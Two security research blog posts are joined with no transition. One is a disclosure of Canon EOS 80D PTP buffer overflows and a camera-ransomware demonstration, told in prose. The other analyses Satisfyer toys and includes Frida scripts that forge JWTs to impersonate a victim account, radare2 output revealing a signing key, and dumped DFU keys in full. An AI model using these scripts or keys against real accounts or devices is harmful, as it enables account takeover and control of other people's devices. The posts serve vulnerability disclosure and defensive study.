Say Cheese: Ransomware-ing a DSLR Camera

Say Cheese: Ransomware-ing a DSLR Camera

Original text by Eyal Itkin

Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us.

In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware?

And the answer is: Yes.

Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment.

Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom.

Below is a Video Demonstration of this attack:

Picture Transfer Protocol (PTP)

Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware.

Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity.

In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim.

In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options.

From an attacker’s perspective, the PTP layer looks like a great target:

  • PTP is an unauthenticated protocol that supports dozens of different complex commands.
  • Vulnerability in PTP can be equally exploited over USB and over WiFi.
  • The WiFi support makes our cameras more accessible to nearby attackers.

In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers:

  • USB – For an attacker that took over your PC, and now wants to propagate into your camera.
  • WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera.

In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files.

Introducing our target

We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including:

Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs.

Attackers are profit-maximisers, they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community.

Obtaining the firmware

This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file in the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1.

Figure 1 – Byte histogram of the firmware update file.

The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file.

Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor.

Feeling stuck, we went back to Google, and checked what the internet has to say about this 

 file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted.

Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere in the internet. Yet another dead end.

The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump.

Figure 2 – Image taken during a ROM Dump of the EOS 80D.

Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera.

Reversing the PTP layer

Finding the PTP layer was quite easy, due to the combination of two useful resources:

  • The PTP layer is command-based, and every command has a unique numeric opcode.
  • The firmware contains many indicative strings, which eases the task of reverse-engineering it.
Figure 3 – PTP-related string from the firmware.

Traversing back from the PTP 

 handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online.

When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high.

PTP Handler API

Each PTP command handler implements the same code API. The API makes use of the 

 object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the 

Figure 4 – Decompiled PTP handler, using the 

As we can see, the context contains function pointers that are used for:

  • Querying about the size of the incoming message.
  • Receiving the incoming message.
  • Sending back the response after handling the message.

It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands.

Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze. Soon enough, we found our first vulnerability.

CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C

PTP Command Name: SendObjectInfo
PTP Command Opcode: 0x100c

Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code:

Figure 5 – Vulnerable code snippet from the 

This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the 

 field into an arbitrary value, and later trigger a call to free it.

This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit.

CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9

PTP Command Name: NotifyBtStatus
PTP Command Opcode: 0x91F9

Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6.

Figure 6 – Vulnerable code snippet from the 

Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest.

CVE-2019-5999– Buffer Overflow in BLERequest – 0x914C

PTP Command Name: BLERequest
PTP Command Opcode: 0x914C

It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7.

Figure 7 – Vulnerable code snippet from the 

We now have 3 similar vulnerabilities:

  • Buffer Overflow over a global structure.
  • Buffer Overflow over the stack.
  • Buffer Overflow over the heap.

As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest.

Gaining Code Execution

We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup.

Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.”

Figure 8 – Crash screen we received when we tested our exploit PoCs.

Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development.

Basic recap of our tools thus far: Our camera has no debugger or ML on it. The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started.

Our plan is to use the 

 function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to 
. This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless.

Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it.

We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution.

Loading Scout

Scout is my goto debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both.

After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi.

We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth.

We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities.

CVE-2019-6000– Buffer Overflow in SendHostInfo – 0x91E4

PTP Command Name: SendHostInfo
PTP Command Opcode: 0x91E4

Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance.

Figure 9 – Vulnerable code snippet from the 

This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊

Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command.

CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport – 0x91FD

PTP Command Name: SendAdapterBatteryReport
PTP Command Opcode: 0x91FD

Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler.

Figure 10 – Vulnerable code snippet from the 

In this case, the stack buffer is rather small, so we will continue using the previous vulnerability.

Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection.

Loading Scout – Second Attempt

Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process.

But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware.

Time for some Crypto

Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go.

This reverse engineering task went much better that we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks.

Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know what are the correct signatures for each part in the firmware update file, effectively gaining a signing primitive by the camera itself.

Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper.

Figure 11 – Image of our customized ROM Dumper, using our header.

CVE-2019-5995 – Silent malicious firmware update:

There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file.

Wrapping it up

After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user.

Chaining everything together requires the attacker to first set-up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect. Once the attacker is within the same LAN as the camera, he can initiate the exploit.

Here is a video presentation of our exploit and ransomware.

Disclosure Timeline

  • 31 March 2019 – Vulnerabilities were reported to Canon.
  • 14 May 2019 – Canon confirmed all of our vulnerabilities.
  • From this point onward, both parties worked together to patch the vulnerabilities.
  • 08 July 2019 – We verified and approved Canon’s patch.
  • 06 August 2019 – Canon published the patch as part of an official security advisory.

Canon’s Security Advisory

Here are the links to the official security advisory that was published by Canon:

We strongly recommend everyone to patch their affected cameras.


During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well.

Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and wide-spread consumer audience makes cameras a lucrative target for attackers.

A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers.

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida

Original text by bananamafia

There’s no good way to start a blog post like this, so let’s dive right in:

Recently, I’ve re-discovered the butthax talk which covered security aspects of Lovense devices. I’ve felt so inspired, that I’ve decided to buy some Satisfyer devices and check out how they work.

These are app-controllable toys that are sold globally, first and foremost in Germany and all over the EU. They have some pretty interesting functionality:

  • Control the device via Bluetooth using an Android app. According to the description it’s a sexual joy and wellness app like no other. o_O
  • Create an account, find new friends and exchange messages and images. Given the nature of this app, it’s quite interesting that Google Play allows everyone above 13 to download and use this app. Well OK.
  • Start remote sessions and allow random dudes from the Internet or your friends to control the Satisfyer.
  • Perform software updates.

Throughout this post, I’ll shed some light on how various aspects of some of these features work. Most importantly, I’ve found an authentication bypass vulnerability that can result in an account takeover. This would have allowed me to forge authentication tokens for every user of the application.

Let’s start with some simple things first.

Bluetooth Communication

Communication between an Android device and a Satisfyer is handled via Bluetooth LE. The app implements many 

 classes for various tasks, like handling low battery status or controlling the device’s vibration. For example, the 
 class, like many others, implements the 
 method to send byte buffers to the device. The buffer contents can be logged with the following Frida script:

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        console.log("[*] sendBuffer(lst<byte>)");

        var stringbuilder = stringbuilderclazz.$new();
        console.log("Buffer: " + stringbuilder.toString());

        // call original


Which yields:

[*] sendBuffer(lst<byte>)
Buffer: [[33, 33, 33, 33], [25, 25, 25, 25]]

Each list is associated to a specific motor of a Satisfyer. The values in a list control the vibration levels for a specific time frame.

It seems that 

 is the maximum value for the vibration level. As an example how the communication could be manipulated with Frida, I’ve decided to modify the list of bytes sent to the device to use the value 

Java.perform(function() {

    var stringclazz = Java.use("java.lang.String");
    var stringbuilderclazz = Java.use('java.lang.StringBuilder');
    var listclazz = Java.use("java.util.List");
    var arrayclazz = Java.use("java.util.Arrays");

    var clazz = Java.use("com.coreteka.satisfyer.ble.control.ToyHolderController");
    clazz.sendBuffer.overload("java.util.List").implementation = function(lst) {

        // create a new byte array containing the value 100
        var byteList = Java.use('java.util.ArrayList').$new();
        var theByte = Java.use('java.lang.Byte').valueOf(100);

        lst.set(0, byteList);
        lst.set(1, byteList);

        var stringbuilder = stringbuilderclazz.$new();
        console.log("Buffer: " + stringbuilder.toString());

        // call the original method with the modified parameter


This worked and changed the scripts output to:

[*] sendBuffer(lst<byte>)
Buffer: [[100, 100, 100, 100], [100, 100, 100, 100]]

Passing negative values, too long lists or things like that caused the device to ignore these input values.

At this point, other commands sent to the Satisfyer could be altered as well. As can be seen, the easiest way to perform this kind of manipulation is changing values before passing them to the low-level functions of the Bluetooth stack.

Internet Communication

I’ve analyzed the API and authentication flow using decompiled code and Burp. To make this work, I’ve utilized the Universal Android SSL Pinning Bypass script.

JWT Authentication

Each request sent to the server has to be authenticated using a JWT. It’s interesting that the client and not the server is responsible for generating the initial JWT:

public final class JwtTokenBuilder {
    public JwtTokenBuilder() {


    private final native String getReleaseKey();

    public final String createJwtToken() {
        Date date = new Date(new Date().getTime() + (long)86400000);
        Object object = "prod".hashCode() != 3449687 ? this.getDevKey() : this.getReleaseKey();
        Charset charset = d.a;
        if (object != null) {
            object = ((String)object).getBytes(charset);
            l.b(object, "(this as java.lang.String).getBytes(charset)");
            object = Keys.hmacShaKeyFor((byte[])object);
            object = Jwts.builder().setSubject("Satisfyer").claim("auth", "ROLE_ANONYMOUS_CLIENT").signWith((Key)object).setExpiration(date).compact();
            return object;

As can be seen, 

 uses a JWT signing key originating from a native library called
. It then signs and uses JWTs like the following:


After reviewing the authentication flow, I’ve determined that there exist (at least) these roles:

     is any client that communicates with the Satisfyer API and is not logged in.
     is a client that has successfully logged in. Ever API request is scoped to information that’s accessible to this specific user account.

An authentication token for a signed in user looks as follows:


While the Android app is responsible for generating the initial JWT with role 

, the server responds with a new JWT after successfully performing a login. This new JWT uses the role 
, as can be seen above.

Would it be possible to use the signing key residing in the shared library to not just sign JWTs with 

, but also with 
? This would let an attacker to interact with the API in the name of someone else. Let’s find out.

Determining the User ID of a Victim

We need two things to forge a JWT for any given account:

  • The account name
  • The user ID of the account

Starting from an account name, determining the user ID is as simple as searching for the account using this API endpoint:

User Search

This can be done by any user with a valid session as 

. Please note the value of the 
 in the server’s response.

Creating Forged JWTs with Frida

See, I’m lazy banana man. So instead of dumping the key and creating the JWT myself, I’ve used Frida to instrument the Satisfyer app to do this for me instead.

The app uses a class implementing the 

 interface to create and sign JWTs. The only class implementing this interface is 
, so I’ve added hooks in there. The plan is as follows:

  • Add a hook to change the 
     claim from 
  • Add a hook to add another claim called 
    , indicating the desired user ID of the victim’s account.
  • Change the JWT subject (
    ) from 
     (as it’s used for anonymous users) to the account name of the victim.

I came up with this Frida script:

Java.perform(function() {
    var clazz = Java.use("io.jsonwebtoken.impl.DefaultJwtBuilder");
    clazz.claim.overload("java.lang.String", "java.lang.Object").implementation = function(name, val) {
        console.log("[*] Entered claim()");

        var Integer = Java.use("java.lang.Integer");

        // the user ID of the victim
        var intInstance = Integer.valueOf(282[...]);

        // modify the "auth" claim and add another claim for "user_id"
        var res = this.claim(name, "ROLE_USER").claim("user_id", intInstance);

        return res;

    var clazz = Java.use("io.jsonwebtoken.impl.DefaultClaims");
    clazz.setSubject.overload("java.lang.String").implementation = function(sub) {
        console.log("[*] Entered setSubject()");

        // modify the subject from "Satisfyer" (anonymous user) to the victim's user name
        return this.setSubject("victim[...]");

    // Trigger JWT generation
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    console.log("[*] Got Token:");

    console.log("[+] Hooking complete")

This worked just fine and generated a forged JWT when starting the app:

$ python3
[+] Got PID 19213
[*] Entered setSubject()
[*] Entered claim()
[*] Got Token:
[+] Hooking complete

Using the Forged JWT

After creating a JWT for my test account, I’ve simply changed the account’s status message:

Set Status

Checking the status text of the victim revealed that this actually worked 😀

To create this screenshot, I had to use another Frida script to remove the secure flag from the 

 class which is used to block the ability to take screenshots.

Using the API is fine and all, but I wanted to inject the forged token into the running app, so that I could use features like remote control and calls more easily. I came up with a Frida script to generate and add a forged JWT into the app’s local storage. This happens just before the app is going to check if a valid JWT already exists using the 


var clazz = Java.use("");
clazz.hasToken.overload().implementation = function() {

    // create new forged token using the hooks described before
    var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
    var jwtTokenBuilder = JwtTokenBuilderClass.$new();
    // createJwtToken() is hooked as well, see above for snippets
    var token = jwtTokenBuilder.createJwtToken();

    // inject token into shared preferences and add bogus values to make the app happy
    return this.hasToken();

The following demo shows the attacker’s phone on the left and the tablet of another dude on the right. Let’s call that dude Antoine.

  1. The attacker is logged in with some random account that’s not relevant for the attack. This account has no friends.
  2. Antoine has a friend in the friends list called victim. In this case, victim refers to the account that is about to be impersonated.
  3. The Frida script is injected into the attacker’s app. It restarts the app and forges a JWT for the victim account. After that, it gets injected into the session storage. At this point, the attacker impersonates the account of victim.
  4. Suddenly, the attacker has a friend in the friends list. This is the account of Antoine, since victim is a friend of his.
  5. The attacker can now message and call Antoine in the name of victim and could control the Satisfyer of Antoine in the name of victim. For this to work, Antoine has to grant access to the caller first, but since he and victim are friends, that should be totally safe, right?

Fear my video editing skillz.

To summarize, the impact of this is quite interesting, since an attacker can now pose as any given user. Next to the ability to send messages as that user, access to the friends list of this compromised account is now possible as well. This means that, in case someone has granted remote dildo access to the compromised account over the Internet, the attacker could now hijack this and control the Satisfyer of another person. After all, the attacker is able to initiate remote sessions as any user.

In the unlikely event that a victim realizes that their account is being impersonated, even changing the password doesn’t help, since the attack doesn’t even require that to be known.

Note: I’ve only tested and verified this using my own test accounts, I’m not interested in controlling your Satisfyers, sorry.

Possible Mitigation

This issue can be mitigated entirely on the server side, since this is the component responsible for verifying JWT signatures:

  1. Although it’s weird, users that are not logged in could still generate and sign their own JWTs on app startup.
  2. After successful authentication, the server replies with a new JWT that’s valid for the respective user account.
  3. JWTs like this, with roles other than 
    , should be signed and verified with another key that never leaves the server.

This way, no changes to the app should be required. It wouldn’t be possible to forge JWTs anymore, since now two different signing keys are in use for anonymous and authenticated clients.

Dumping the JWT Signing Key

For completeness sake, I’ve dumped the JWT signing key using various methods. This key can then be used in external applications to create signed JWTs without relying on Frida and the Android application itself.

The Static Way with radare2

The easiest way is to extract the key statically:

$ r2 -A
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x000009bc]> afl
0x00000b40    1 20           sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000a98]> s sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey
[0x00000b40]> pdf
            ; UNKNOWN XREF from section..dynsym @ +0x98
┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366

As you can see, a static key is loaded from address 


That was too easy, let’s check other methods to dump the key.

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method 

 is declared as 
. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the 

 Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida 

 to print the value returned by the 
 export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"),{
    onEnter: hookEnter,
    onLeave: hookLeave

function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");

    // if it would return a byte[] instead of String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for(var i = 0; i < buffer.length; ++i){
        result += (String.fromCharCode(buffer[i]));

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the 

 register at offset 
 are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset 
     to this address
  • Add a trace command for this address to dump the contents of the 
  • Trigger the key generation

Let’s see how it works

After triggering the generation of a JWT, tracing kicks in and dumps the value of 

, which is a pointer to the hardcoded string.

As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.

This sounds different than what the Satisfyer app is currently using, since it uses an 

 account with a static password. In fact, coturn servers offer a web interface that’s only reachable via HTTPS that allow 
 users to login. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let’s just hope this panel is not accessible, right? RIGHT?

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something into a test device is a firmware package of the vendor. Unfortunately, all of my Satisfyer devices were already shipped to me with up-to-date firmware. There’s an API endpoint that allows downloading firmware images but it requires brute forcing various parameter values and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I’ve found a way to trigger the update process, that is calling 

 of the class 
. A great way to see what’s actually going on is to place hooks in any classes used for logging purposes. In case of Satisfyer Connect, the 
 class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED

Based on the debug messages, I’ve started to build a file that can be flashed on the device. I’ve lost interest in that shortly after but in case my results are helpful for anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

FILE = ""

# header
FILE += "\x47\x4D"

# sizeOfMergedFile
FILE += "\x3e\x00\x00\x00"


# extension
FILE += "\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += "\x01\x00\x00\x00"

# start addr
